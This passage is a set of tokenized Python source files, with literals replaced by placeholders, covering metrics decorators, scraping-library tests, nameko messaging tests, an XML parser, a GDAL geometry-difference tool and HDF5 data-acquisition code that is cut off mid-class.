% get_qualname ( fn ) ) . inc ( ) <EOL> return fn ( * args , ** kwargs ) <EOL> return wrapper <EOL> def meter_calls ( fn ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( fn ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> meter ( "<STR_LIT>" % get_qualname ( fn ) ) . mark ( ) <EOL> return fn ( * args , ** kwargs ) <EOL> return wrapper <EOL> def hist_calls ( fn ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( fn ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> _histogram = histogram ( "<STR_LIT>" % get_qualname ( fn ) ) <EOL> rtn = fn ( * args , ** kwargs ) <EOL> if type ( rtn ) in ( int , float ) : <EOL> _histogram . update ( rtn ) <EOL> return rtn <EOL> return wrapper <EOL> def time_calls ( fn ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( fn ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> _timer = timer ( "<STR_LIT>" % get_qualname ( fn ) ) <EOL> with _timer . time ( fn = get_qualname ( fn ) ) : <EOL> return fn ( * args , ** kwargs ) <EOL> return wrapper </s>
<s> import_partial_relations = False <EOL> relation_builder = '<STR_LIT>' <EOL> imposm_multipolygon_report = <NUM_LIT> <EOL> imposm_multipolygon_max_ring = <NUM_LIT:0> <EOL> imposm_linestring_max_length = <NUM_LIT:0> <EOL> imposm_pg_serial_id = True <EOL> imposm_compact_coords_cache = True </s>
<s> import responses <EOL> import unittest2 as unittest <EOL> import livescrape <EOL> class BasePage ( livescrape . ScrapedPage ) : <EOL> scrape_url = "<STR_LIT>" <EOL> class Test ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> responses . reset ( ) <EOL> responses . add ( <EOL> responses . GET , BasePage . scrape_url , <EOL> """<STR_LIT>""" ) <EOL> responses . start ( ) <EOL> self . addCleanup ( responses . stop ) <EOL> def test_simplecss ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , '<STR_LIT>' ) <EOL> def test_dict ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . _dict , { "<STR_LIT:foo>" : '<STR_LIT>' } ) <EOL> def test_ambigous ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , '<STR_LIT>' ) <EOL> def test_multiple ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" , <EOL> multiple = True ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_attribute ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" , <EOL> attribute = "<STR_LIT>" ) <EOL> not_there = livescrape . Css ( "<STR_LIT>" , <EOL> attribute = "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , '<STR_LIT:1>' ) <EOL> self . assertIsNone ( x . not_there ) <EOL> def test_link ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssLink ( "<STR_LIT:a>" , "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertIsInstance ( x . foo , Page ) <EOL> self . assertEqual ( x . foo . scrape_url , <EOL> "<STR_LIT>" ) <EOL> def test_float ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssFloat ( "<STR_LIT>" ) <EOL> foo_fail = livescrape . CssFloat ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertAlmostEqual ( x . foo , <NUM_LIT> ) <EOL> self . assertIsNone ( x . foo_fail ) <EOL> def test_int ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssInt ( "<STR_LIT>" ) <EOL> foo_fail = livescrape . CssInt ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , <NUM_LIT> ) <EOL> self . assertIsNone ( x . foo_fail ) <EOL> def test_date ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssDate ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> foo_fail = livescrape . CssDate ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo . year , <NUM_LIT> ) <EOL> self . assertIsNone ( x . foo_fail ) <EOL> def test_bool ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssBoolean ( "<STR_LIT>" ) <EOL> bar = livescrape . CssBoolean ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertTrue ( x . foo ) <EOL> self . assertFalse ( x . bar ) <EOL> def test_raw ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssRaw ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , "<STR_LIT>" ) <EOL> def test_complex ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssMulti ( <EOL> "<STR_LIT>" , <EOL> key = livescrape . Css ( "<STR_LIT>" ) , <EOL> value = livescrape . Css ( "<STR_LIT>" ) ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , [ { "<STR_LIT:key>" : "<STR_LIT:key>" , "<STR_LIT:value>" : "<STR_LIT:value>" } , <EOL> { "<STR_LIT:key>" : "<STR_LIT>" , "<STR_LIT:value>" : "<STR_LIT>" } ] ) <EOL> def test_group ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssGroup ( "<STR_LIT>" , multiple = True ) <EOL> foo . key = livescrape . Css ( "<STR_LIT>" ) <EOL> foo . value = livescrape . Css ( "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:0> ] [ "<STR_LIT:key>" ] , "<STR_LIT:key>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:0> ] [ "<STR_LIT:value>" ] , "<STR_LIT:value>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:1> ] [ "<STR_LIT:key>" ] , "<STR_LIT>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:1> ] [ "<STR_LIT:value>" ] , "<STR_LIT>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:0> ] . key , "<STR_LIT:key>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:0> ] . value , "<STR_LIT:value>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:1> ] . key , "<STR_LIT>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:1> ] . value , "<STR_LIT>" ) <EOL> self . assertEqual ( x . foo [ <NUM_LIT:0> ] . _dict ( ) , <EOL> { "<STR_LIT:key>" : "<STR_LIT:key>" , "<STR_LIT:value>" : "<STR_LIT:value>" } ) <EOL> self . assertEqual ( [ x for x in dir ( x . foo [ <NUM_LIT:1> ] ) <EOL> if x [ <NUM_LIT:0> ] != "<STR_LIT:_>" ] , <EOL> [ "<STR_LIT:key>" , "<STR_LIT:value>" ] ) <EOL> with self . assertRaises ( AttributeError ) : <EOL> x . foo [ <NUM_LIT:0> ] . nonexistent <EOL> def test_cleanup ( self ) : <EOL> cleanup_args = [ None ] <EOL> def cleanup ( x ) : <EOL> self . assertIsNone ( cleanup_args [ <NUM_LIT:0> ] ) <EOL> cleanup_args [ <NUM_LIT:0> ] = x <EOL> return "<STR_LIT>" <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" , <EOL> cleanup = cleanup ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , "<STR_LIT>" ) <EOL> self . assertEqual ( cleanup_args [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> def test_extract ( self ) : <EOL> extract_args = [ None ] <EOL> def extract ( x ) : <EOL> self . assertIsNone ( extract_args [ <NUM_LIT:0> ] ) <EOL> extract_args [ <NUM_LIT:0> ] = x <EOL> return "<STR_LIT>" <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" , <EOL> extract = extract ) <EOL> x = Page ( ) <EOL> self . assertEqual ( x . foo , "<STR_LIT>" ) <EOL> self . assertEqual ( extract_args [ <NUM_LIT:0> ] . text , "<STR_LIT>" ) <EOL> def test_cleanup_extract ( self ) : <EOL> cleanup_args = [ None ] <EOL> extract_args = [ None ] <EOL> def cleanup ( x ) : <EOL> self . assertIsNone ( cleanup_args [ <NUM_LIT:0> ] ) <EOL> cleanup_args [ <NUM_LIT:0> ] = x <EOL> return "<STR_LIT>" <EOL> def extract ( x ) : <EOL> self . assertIsNone ( extract_args [ <NUM_LIT:0> ] ) <EOL> extract_args [ <NUM_LIT:0> ] = x <EOL> return "<STR_LIT>" <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . Css ( "<STR_LIT>" , <EOL> cleanup = cleanup , <EOL> extract = extract ) <EOL> x = Page ( ) <EOL> value = x . foo <EOL> self . assertEqual ( extract_args [ <NUM_LIT:0> ] . text , "<STR_LIT>" ) <EOL> self . assertEqual ( cleanup_args [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> self . assertEqual ( value , "<STR_LIT>" ) <EOL> def test_decorator ( self ) : <EOL> cleanup_args = [ None ] <EOL> extract_args = [ None ] <EOL> method_args = [ None ] <EOL> def cleanup ( x ) : <EOL> self . assertIsNone ( cleanup_args [ <NUM_LIT:0> ] ) <EOL> cleanup_args [ <NUM_LIT:0> ] = x <EOL> return "<STR_LIT>" <EOL> def extract ( x ) : <EOL> self . assertIsNone ( extract_args [ <NUM_LIT:0> ] ) <EOL> extract_args [ <NUM_LIT:0> ] = x <EOL> return "<STR_LIT>" <EOL> class Page ( BasePage ) : <EOL> @ livescrape . Css ( "<STR_LIT>" , <EOL> cleanup = cleanup , <EOL> extract = extract ) <EOL> def foo ( self , value , element ) : <EOL> method_args [ <NUM_LIT:0> ] = ( value , element ) <EOL> return "<STR_LIT>" <EOL> x = Page ( ) <EOL> value = x . foo <EOL> self . assertEqual ( extract_args [ <NUM_LIT:0> ] . text , "<STR_LIT>" ) <EOL> self . assertEqual ( cleanup_args [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> self . assertEqual ( method_args [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> self . assertEqual ( method_args [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . text , "<STR_LIT>" ) <EOL> self . assertEqual ( value , "<STR_LIT>" ) <EOL> def test_headers ( self ) : <EOL> class Page ( BasePage ) : <EOL> scrape_headers = { "<STR_LIT:foo>" : "<STR_LIT:bar>" } <EOL> Page ( ) . scrape_fetch ( BasePage . scrape_url ) <EOL> self . assertEqual ( len ( responses . calls ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( responses . calls [ <NUM_LIT:0> ] . request . headers [ '<STR_LIT>' ] , <EOL> '<STR_LIT:bar>' ) <EOL> def test_referer ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssLink ( "<STR_LIT:a>" , "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertIsInstance ( x . foo , Page ) <EOL> responses . add ( <EOL> responses . GET , x . foo . scrape_url , <EOL> "<STR_LIT>" ) <EOL> self . assertIsNone ( x . foo . foo ) <EOL> self . assertEqual ( len ( responses . calls ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( responses . calls [ <NUM_LIT:1> ] . request . headers [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> def test_custom_referer ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssLink ( "<STR_LIT:a>" , "<STR_LIT>" , referer = "<STR_LIT>" ) <EOL> x = Page ( ) <EOL> self . assertIsInstance ( x . foo , Page ) <EOL> responses . add ( <EOL> responses . GET , x . foo . scrape_url , <EOL> "<STR_LIT>" ) <EOL> self . assertIsNone ( x . foo . foo ) <EOL> self . assertEqual ( len ( responses . calls ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( responses . calls [ <NUM_LIT:1> ] . request . headers [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> def test_no_referer ( self ) : <EOL> class Page ( BasePage ) : <EOL> foo = livescrape . CssLink ( "<STR_LIT:a>" , "<STR_LIT>" , referer = False ) <EOL> x = Page ( ) <EOL> self . assertIsInstance ( x . foo , Page ) <EOL> responses . add ( <EOL> responses . GET , x . foo . scrape_url , <EOL> "<STR_LIT>" ) <EOL> self . assertIsNone ( x . foo . foo ) <EOL> self . assertEqual ( len ( responses . calls ) , <NUM_LIT:2> ) <EOL> self . assertNotIn ( "<STR_LIT>" , responses . calls [ <NUM_LIT:1> ] . request . headers ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import csv <EOL> import sys <EOL> def last_index ( list_ , value ) : <EOL> """<STR_LIT>""" <EOL> found = None <EOL> for index , val in enumerate ( list_ ) : <EOL> if val == value : <EOL> found = index <EOL> if found is None : <EOL> raise ValueError ( "<STR_LIT>" . format ( value , list_ ) ) <EOL> return found <EOL> def abort ( message = None ) : <EOL> if message is not None : <EOL> print >> sys . stderr , message <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def csv_list ( value ) : <EOL> for line in csv . reader ( [ value ] , skipinitialspace = True ) : <EOL> return line <EOL> def csv_dict ( value ) : <EOL> for line in csv . reader ( [ value ] , skipinitialspace = True ) : <EOL> return dict ( kv . split ( '<STR_LIT:=>' ) for kv in line ) </s>
<s> from nameko . events import event_handler <EOL> from nameko . standalone . events import event_dispatcher <EOL> from nameko . testing . services import entrypoint_waiter <EOL> class ServiceB ( object ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> @ event_handler ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def handle_event ( self , payload ) : <EOL> print ( "<STR_LIT>" , payload ) <EOL> def test_event_interface ( container_factory , rabbit_config ) : <EOL> container = container_factory ( ServiceB , rabbit_config ) <EOL> container . start ( ) <EOL> dispatch = event_dispatcher ( rabbit_config ) <EOL> with entrypoint_waiter ( container , '<STR_LIT>' ) : <EOL> dispatch ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" </s>
<s> import socket <EOL> import pytest <EOL> from urllib3 . util import parse_url , Url <EOL> from nameko . amqp import verify_amqp_uri <EOL> @ pytest . fixture <EOL> def uris ( rabbit_config ) : <EOL> amqp_uri = rabbit_config [ '<STR_LIT>' ] <EOL> scheme , auth , host , port , path , _ , _ = parse_url ( amqp_uri ) <EOL> bad_port = Url ( scheme , auth , host , port + <NUM_LIT:1> , path ) . url <EOL> bad_user = Url ( scheme , '<STR_LIT>' , host , port , path ) . url <EOL> bad_vhost = Url ( scheme , auth , host , port , '<STR_LIT>' ) . url <EOL> return { <EOL> '<STR_LIT>' : amqp_uri , <EOL> '<STR_LIT>' : bad_port , <EOL> '<STR_LIT>' : bad_user , <EOL> '<STR_LIT>' : bad_vhost , <EOL> } <EOL> def test_good ( uris ) : <EOL> amqp_uri = uris [ '<STR_LIT>' ] <EOL> verify_amqp_uri ( amqp_uri ) <EOL> def test_bad_user ( uris ) : <EOL> amqp_uri = uris [ '<STR_LIT>' ] <EOL> with pytest . raises ( IOError ) as exc_info : <EOL> verify_amqp_uri ( amqp_uri ) <EOL> message = str ( exc_info . value ) <EOL> assert '<STR_LIT>' in message <EOL> assert '<STR_LIT>' in message <EOL> def test_bad_vhost ( uris ) : <EOL> amqp_uri = uris [ '<STR_LIT>' ] <EOL> with pytest . raises ( IOError ) as exc_info : <EOL> verify_amqp_uri ( amqp_uri ) <EOL> message = str ( exc_info . value ) <EOL> assert '<STR_LIT>' in message <EOL> assert '<STR_LIT>' in message <EOL> def test_other_error ( uris ) : <EOL> amqp_uri = uris [ '<STR_LIT>' ] <EOL> with pytest . raises ( socket . error ) : <EOL> verify_amqp_uri ( amqp_uri ) </s>
<s> '''<STR_LIT>''' <EOL> import xml . dom . minidom <EOL> __all__ = ( '<STR_LIT>' , ) <EOL> class XMLNode : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . name = "<STR_LIT>" <EOL> self . text = "<STR_LIT>" <EOL> self . attrib = { } <EOL> self . xml = None <EOL> def __setitem__ ( self , key , item ) : <EOL> """<STR_LIT>""" <EOL> self . attrib [ key ] = item <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self . attrib [ key ] <EOL> @ classmethod <EOL> def __parse_element ( cls , element , this_node ) : <EOL> """<STR_LIT>""" <EOL> this_node . name = element . nodeName <EOL> for i in range ( element . attributes . length ) : <EOL> an = element . attributes . item ( i ) <EOL> this_node [ an . name ] = an . nodeValue <EOL> for a in element . childNodes : <EOL> if a . nodeType == xml . dom . Node . ELEMENT_NODE : <EOL> child = XMLNode ( ) <EOL> if not hasattr ( this_node , a . nodeName ) or a . nodeName == '<STR_LIT:name>' : <EOL> setattr ( this_node , a . nodeName , [ ] ) <EOL> children = getattr ( this_node , a . nodeName ) <EOL> children . append ( child ) <EOL> cls . __parse_element ( a , child ) <EOL> elif a . nodeType == xml . dom . Node . TEXT_NODE : <EOL> this_node . text += a . nodeValue <EOL> return this_node <EOL> @ classmethod <EOL> def parse ( cls , xml_str , store_xml = False ) : <EOL> """<STR_LIT>""" <EOL> dom = xml . dom . minidom . parseString ( xml_str ) <EOL> root_node = XMLNode ( ) <EOL> if store_xml : <EOL> root_node . xml = xml_str <EOL> return cls . __parse_element ( dom . firstChild , root_node ) </s>
<s> CHUNK = b'<STR_LIT:C>' <EOL> FILE = b'<STR_LIT:F>' <EOL> ERROR = b'<STR_LIT:E>' <EOL> OK = b'<STR_LIT:O>' </s>
<s> import time <EOL> from random import randint <EOL> from tests . utils . benchmark import Benchmark , BenchmarkData <EOL> class TestBenchmark ( Benchmark ) : <EOL> def setup ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> self . test = <NUM_LIT:0> <EOL> def test_nosetup ( self ) : <EOL> """<STR_LIT>""" <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' . format ( self . test ) ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def setup_withsetup ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> self . test = <NUM_LIT:3> <EOL> def test_withsetup ( self ) : <EOL> """<STR_LIT>""" <EOL> print ( '<STR_LIT>' <EOL> . format ( self . test ) ) <EOL> test = BenchmarkData ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> test . add_result ( self . test ) <EOL> return test <EOL> def teardown_withsetup ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> self . test = <NUM_LIT> <EOL> def test_loop ( self ) : <EOL> """<STR_LIT>""" <EOL> test = BenchmarkData ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:30> ) : <EOL> test . add_result ( randint ( <NUM_LIT:0> , <NUM_LIT:1000> ) ) <EOL> return test <EOL> def test_zorglub ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' . format ( self . test ) ) <EOL> test = BenchmarkData ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> unit = '<STR_LIT>' <EOL> ) <EOL> test . add_result ( self . test ) <EOL> return test <EOL> def test_benchmark ( ) : <EOL> t = TestBenchmark ( '<STR_LIT>' , verbose = True ) <EOL> t . run ( ) <EOL> print ( '<STR_LIT>' . format ( '<STR_LIT>' ) ) <EOL> t . display ( ) <EOL> results = t . get_results ( ) <EOL> nosetup = results [ '<STR_LIT>' ] <EOL> withsetup = results [ '<STR_LIT>' ] <EOL> loop = results [ '<STR_LIT>' ] <EOL> zorglub = results [ '<STR_LIT>' ] <EOL> assert ( len ( nosetup [ '<STR_LIT>' ] ) == <NUM_LIT:1> ) <EOL> assert ( nosetup [ '<STR_LIT>' ] [ <NUM_LIT:0> ] >= <NUM_LIT> ) <EOL> assert ( nosetup [ '<STR_LIT>' ] is None ) <EOL> assert ( nosetup [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> assert ( withsetup [ '<STR_LIT>' ] [ <NUM_LIT:0> ] == <NUM_LIT:3> ) <EOL> assert ( len ( loop [ '<STR_LIT>' ] ) == <NUM_LIT:30> ) <EOL> for r in loop [ '<STR_LIT>' ] : <EOL> assert ( r >= <NUM_LIT:0> and r <= <NUM_LIT:1000> ) <EOL> assert ( zorglub [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> assert ( zorglub [ '<STR_LIT>' ] [ <NUM_LIT:0> ] == <NUM_LIT> ) <EOL> assert ( zorglub [ '<STR_LIT>' ] == '<STR_LIT>' ) </s>
<s> from . test_driver import start , plug <EOL> __all__ = [ "<STR_LIT:start>" , "<STR_LIT>" ] </s>
<s> import shutil <EOL> from osgeo import gdal <EOL> from osgeo import ogr <EOL> from ogrkit . cli import OGRKitUtility <EOL> from ogrkit . utils import get_bounding_box <EOL> gdal . UseExceptions ( ) <EOL> class OGRDifference ( OGRKitUtility ) : <EOL> description = '<STR_LIT>' <EOL> def add_arguments ( self ) : <EOL> self . argparser . add_argument ( '<STR_LIT>' , metavar = '<STR_LIT>' , nargs = '<STR_LIT:+>' , type = str ) <EOL> def main ( self ) : <EOL> source = ogr . Open ( self . args . input , False ) <EOL> source_layer = source . GetLayer ( <NUM_LIT:0> ) <EOL> try : <EOL> shutil . rmtree ( self . args . output ) <EOL> except OSError : <EOL> pass <EOL> driver = ogr . GetDriverByName ( '<STR_LIT>' ) <EOL> dest = driver . CreateDataSource ( self . args . output ) <EOL> dest_layer = dest . CreateLayer ( '<STR_LIT>' , geom_type = ogr . wkbMultiPolygon ) <EOL> for i in range ( source_layer . GetLayerDefn ( ) . GetFieldCount ( ) ) : <EOL> dest_layer . CreateField ( source_layer . GetLayerDefn ( ) . GetFieldDefn ( i ) ) <EOL> mask_features = [ ] <EOL> mask_boxes = [ ] <EOL> for mask in self . args . masks : <EOL> geo = ogr . Open ( mask , False ) <EOL> layer = geo . GetLayer ( <NUM_LIT:0> ) <EOL> for feature in layer : <EOL> mask_features . append ( feature ) <EOL> mask_boxes . append ( get_bounding_box ( feature . GetGeometryRef ( ) ) ) <EOL> for feature in source_layer : <EOL> masked_feature = ogr . Feature ( feature_def = source_layer . GetLayerDefn ( ) ) <EOL> masked_feature . SetFrom ( feature ) <EOL> masked_geometry = feature . GetGeometryRef ( ) . Clone ( ) <EOL> for ( i , mask_feature ) in enumerate ( mask_features ) : <EOL> bounding_box = mask_boxes [ i ] <EOL> if not masked_geometry . Intersects ( bounding_box ) : <EOL> continue <EOL> masked_geometry = masked_geometry . Difference ( mask_feature . GetGeometryRef ( ) ) <EOL> masked_feature . SetGeometryDirectly ( masked_geometry ) <EOL> dest_layer . CreateFeature ( masked_feature ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from pyon . public import Container , ImmediateProcess <EOL> from pyon . util . context import LocalContextMixin <EOL> from pyon . core . governance import get_actor_header <EOL> from interface . services . examples . hello . ihello_service import HelloServiceProcessClient <EOL> from interface . services . icontainer_agent import ContainerAgentProcessClient <EOL> class FakeProcess ( LocalContextMixin ) : <EOL> name = '<STR_LIT>' <EOL> id = '<STR_LIT>' <EOL> class HelloClientProcess ( ImmediateProcess ) : <EOL> """<STR_LIT>""" <EOL> def on_init ( self ) : <EOL> pass <EOL> def on_start ( self ) : <EOL> text = self . CFG . get ( "<STR_LIT:text>" , '<STR_LIT>' ) <EOL> actor_id = self . CFG . get ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> container_name = self . CFG . get ( "<STR_LIT>" , None ) <EOL> hello_client ( self . container , actor_id , text ) <EOL> if container_name : <EOL> cc_client = ContainerAgentProcessClient ( node = self . container . node , process = self , name = container_name ) <EOL> cc_client . stop ( ) <EOL> def on_quit ( self ) : <EOL> pass <EOL> def hello_client ( container , actor_id = '<STR_LIT>' , text = '<STR_LIT>' ) : <EOL> try : <EOL> client = HelloServiceProcessClient ( node = container . node , process = FakeProcess ( ) ) <EOL> actor_headers = get_actor_header ( actor_id ) <EOL> ret = client . hello ( text , headers = actor_headers ) <EOL> print "<STR_LIT>" + str ( ret ) <EOL> ret = client . hello ( '<STR_LIT>' , headers = actor_headers ) <EOL> print "<STR_LIT>" + str ( ret ) <EOL> ret = client . noop ( text = '<STR_LIT>' , headers = actor_headers ) <EOL> print "<STR_LIT>" <EOL> except Exception , e : <EOL> print "<STR_LIT>" + e . message <EOL> def hello_noop ( container , actor_id = '<STR_LIT>' , text = '<STR_LIT>' ) : <EOL> try : <EOL> client = HelloServiceProcessClient ( node = container . node , process = FakeProcess ( ) ) <EOL> actor_headers = get_actor_header ( actor_id ) <EOL> ret = client . noop ( text , headers = actor_headers ) <EOL> except Exception , e : <EOL> print "<STR_LIT>" + e . message <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> container = Container ( ) <EOL> container . start ( ) <EOL> hello_client ( container , actor_id = '<STR_LIT>' ) <EOL> container . stop ( ) </s>
<s> '''<STR_LIT>''' <EOL> from operator import mul <EOL> from pyon . core . exception import NotFound , BadRequest <EOL> from pyon . public import log <EOL> import itertools <EOL> def acquire_data ( hdf_files = None , var_names = None , concatenate_size = None , bounds = None ) : <EOL> import h5py , numpy <EOL> if hdf_files is None : <EOL> raise NotFound ( '<STR_LIT>' ) <EOL> if var_names is None : <EOL> raise NotFound ( '<STR_LIT>' ) <EOL> if concatenate_size is None : <EOL> raise NotFound ( '<STR_LIT>' ) <EOL> open_files = [ ] <EOL> try : <EOL> for hdf_file in hdf_files : <EOL> try : <EOL> file = h5py . File ( hdf_file , '<STR_LIT:r>' ) <EOL> except IOError as ioe : <EOL> log . exception ( '<STR_LIT>' , hdf_file ) <EOL> try : <EOL> file = h5py . File ( hdf_file , '<STR_LIT:r>' ) <EOL> except : <EOL> log . exception ( '<STR_LIT>' , hdf_file ) <EOL> if len ( hdf_files ) == <NUM_LIT:1> : <EOL> raise ioe <EOL> open_files . append ( file ) <EOL> gen = _acquire_hdf_data ( open_hdf_files = open_files , var_names = var_names , concatenate_size = concatenate_size , bounds = bounds ) <EOL> for item in gen : <EOL> yield item <EOL> finally : <EOL> for file in open_files : <EOL> file . close ( ) <EOL> def _acquire_hdf_data ( open_hdf_files = None , var_names = None , concatenate_size = None , bounds = None ) : <EOL> import h5py , numpy <EOL> out_dict = { } <EOL> def check_for_dataset ( nodes , var_names ) : <EOL> """<STR_LIT>""" <EOL> import h5py <EOL> for node in nodes : <EOL> if isinstance ( node , h5py . _hl . dataset . Dataset ) : <EOL> dataset_name = node . name . rsplit ( '<STR_LIT:/>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> dataset = node <EOL> if dataset_name in var_names : <EOL> dict_of_h5py_datasets [ dataset_name ] = dataset <EOL> elif isinstance ( node , h5py . _hl . group . Group ) : <EOL> check_for_dataset ( node . values ( ) , var_names ) <EOL> dataset_lists_by_name = { } <EOL> for file in open_hdf_files : <EOL> dict_of_h5py_datasets = { } <EOL> chopped_end = { } <EOL> log . debug ( '<STR_LIT>' % file ) <EOL> nodes = file . values ( ) <EOL> check_for_dataset ( nodes , var_names ) <EOL> log . debug ( '<STR_LIT>' % dict_of_h5py_datasets ) <EOL> if not dict_of_h5py_datasets : <EOL> continue <EOL> for vname in var_names : <EOL> dataset = dict_of_h5py_datasets . get ( vname , None ) <EOL> if dataset : <EOL> dset_list = dataset_lists_by_name . get ( vname , [ ] ) <EOL> dset_list . append ( dataset ) <EOL> dataset_lists_by_name [ vname ] = dset_list <EOL> array_iterators_by_name = { } <EOL> if len ( dataset_lists_by_name . keys ( ) ) == <NUM_LIT:0> : <EOL> raise NotFound ( '<STR_LIT>' ) <EOL> for vname , dset_list in dataset_lists_by_name . iteritems ( ) : <EOL> virtual_dset = VirtualDataset ( dset_list ) <EOL> if bounds : <EOL> check_bounds ( bounds , virtual_dset ) <EOL> iarray = ArrayIterator ( virtual_dset , concatenate_size ) [ bounds ] <EOL> else : <EOL> iarray = ArrayIterator ( virtual_dset , concatenate_size ) <EOL> array_iterators_by_name [ vname ] = iarray <EOL> log . warn ( array_iterators_by_name ) <EOL> names = array_iterators_by_name . keys ( ) <EOL> iarrays = array_iterators_by_name . values ( ) <EOL> log . warn ( '<STR_LIT>' % len ( iarrays ) ) <EOL> for ichunks in itertools . izip_longest ( * iarrays ) : <EOL> log . warn ( '<STR_LIT>' % len ( ichunks ) ) <EOL> for name , chunk , iarray in itertools . izip ( names , ichunks , iarrays ) : <EOL> out_dict [ name ] = { '<STR_LIT>' : iarray . curr_slice , <EOL> '<STR_LIT>' : ( numpy . nanmin ( chunk ) , numpy . nanmax ( chunk ) ) , <EOL> '<STR_LIT>' : chunk } <EOL> yield out_dict <EOL> def check_bounds ( bounds , virtual_dset ) : <EOL> """<STR_LIT>""" <EOL> if type ( bounds ) != tuple and type ( bounds ) != slice : <EOL> raise BadRequest ( '<STR_LIT>' ) <EOL> if type ( bounds ) == tuple and len ( bounds ) > len ( virtual_dset . shape ) : <EOL> raise BadRequest ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class VirtualDataset ( object ) : <EOL> def __init__ ( self , var_list ) : <EOL> import h5py , numpy <EOL> self . _vars = [ ] <EOL> self . _records = <NUM_LIT:0> <EOL> self . _starts = [ ] <EOL> self . _stops = [ ] <EOL> agg_shape = None <EOL> for var in var_list : <EOL> vv = { } <EOL> vv [ 